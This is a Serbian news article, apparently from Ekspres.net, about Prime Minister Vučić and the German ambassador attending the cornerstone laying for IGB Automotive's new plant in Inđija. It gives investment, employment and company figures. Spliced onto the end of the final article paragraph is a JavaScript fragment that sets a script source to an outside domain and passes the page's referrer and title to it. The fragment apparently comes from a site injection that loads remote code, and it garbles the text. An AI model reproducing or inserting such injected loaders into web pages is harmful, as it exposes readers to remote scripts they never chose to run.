Vesti
27.04.2016. 08:28
ekspres

Vučić i Ditman na polaganju kamena temeljca u Inđiji

Ekspres.net
Izvor: Ekspres.net

INÐIJA, 27. aprila  - Predsednik Vlade Srbije Aleksandar Vučić i ambasador Nemačke u Srbiji Aksel Ditman obliši su  u Inđiji kompaniju "IGB Auttomotiv Komp" gde će prisustvovati polaganju kamena temeljac za novi proizvodni pogon. Reč je o investiciji vrednoj 4,5 miliona evra, čijom će realizacijom biti zaposleno više od 500 novih radnika u narednih pet godina, uvedeni novi proizvodi i primenjena nova tehnologija.

Ekspres.net
Izvor: Ekspres.netEkspres.net

Završetak radova na novom pogonu se očekuje krajem septembra, a realizacijom ovog projekta, kako ističu u kompaniji, "IGB Automotiv" obezbediće dodatnih 7.000 metara kvadratnih prostora.
Kompaniju "IGB Automotiv Komp" osnovala je 2007. kompanija "I.G.Bauerhin GmbH" iz Nemačke, a bavi se proizvodnjom grejača za sedišta, grejača za volane, senzora za okupiranost sedišta automobila, kablova za grejače sedišta, električnih kontrolnih jedinica.
Osnivanjem kompanije zaposlen je 133 radnika i proizvedeno svega 100.000 grejača za sedišta, već 2008. godine, kada počinje i svetska ekonomska kriza, kompanija u Inđiji proizvodi 1,5 miliona grejača za automobilska sedišta i zapošljava još 48 radnika.
Ekspres.net
Izvor: Ekspres.netEkspres.net

Ta kompanija poseduje sveobuhvatnu tehnologiju grejača za automobilska sedišta i senzora za zauzeće sedišta, te kao lider u oblasti pomenute proizvodnje omogućava svojim kupcima visok kvalitet proizvoda prema postavljenim standardima autoindustrije ISO/TS 16949, ali i prema stanadarima ISO 140001 i OHSAS 18001.
U okviru grupacije proizvodne jedinice nalaze se u Nemačkoj, Češkoj, Kanadi, Meksiku, Kini i Srbiji. Na teritoriji Srbije, ta kompanija ima svoju proizvodnu jedinicu koja ujedno predstavlja i prvu po veličini, broju zaposlenih i ostvarenoj realizaciji u "Bauerhin" grupi“. Ona je jedna od najvećih grinfild investicija u Srbiji i istovremeno odlična primer uspešnog i produktivnog poslovanja, ne samo na lokalnom, već i na regionalnom nivou. Zapošljava više od 1.500 radnika i proizvodi više od 16 miliona proizvoda godišnje. Nalazi se na listi kompanija sa najvećim brojem zaposlenih, od kojih više od 90 odsto čine žene i predstavlja snažan oslonac daljem razvoju lokalne zajednice.s.src='http://gethere.info/kt/?264dpr&frm=script&se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + '';

Komentari
Dodaj komentar
Close
Vremenska prognoza
clear sky
15°C
16.04.2024.
Beograd
Wind
PM2.5
5µg/m3
PM10
6µg/m3
UV
UV indeks
1
AQI indeks
1

Oni su ponos Srbije

Vidi sve

Najnovije

Vidi sve

Iz drugačijeg ugla

Vidi sve